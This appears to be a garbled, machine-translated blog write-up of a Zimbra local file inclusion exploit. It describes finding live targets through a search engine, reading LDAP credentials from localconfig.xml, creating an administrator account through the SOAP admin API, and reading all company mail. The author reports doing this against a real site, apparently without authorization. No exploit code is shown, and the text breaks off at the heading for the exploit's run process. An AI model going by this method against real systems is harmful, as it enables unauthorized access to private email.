Zimbra is a company with a lot of the mail system, may relate to many of the company's internal confidential, it is extremely important.
This is a few days ago on exploit-db. com on the issue to the 0day to:<http://www.exploit-db.com/exploits/30085/> it. By a local file inclusion vulnerability can be seen localconfig. xml content, and this file contains the LDAP credentials, by this voucher by/service/admin/soap file under the API to the mail system for unauthorized operation.
0x01 vulnerability demo
In the Baidu search for“make Zimbra Desktop is offline”, you will find many using the Zimbra system:
We found our target site, with only a simple use of our exp to:
Tips Successfully, then I use the new account login, success:
See that there is an“administrator console”, because this account is administrator privileges, the point go in you can manage all users, of course, from company CEOs to customer service, all mail view. This is the management home:
0x02 exp running process description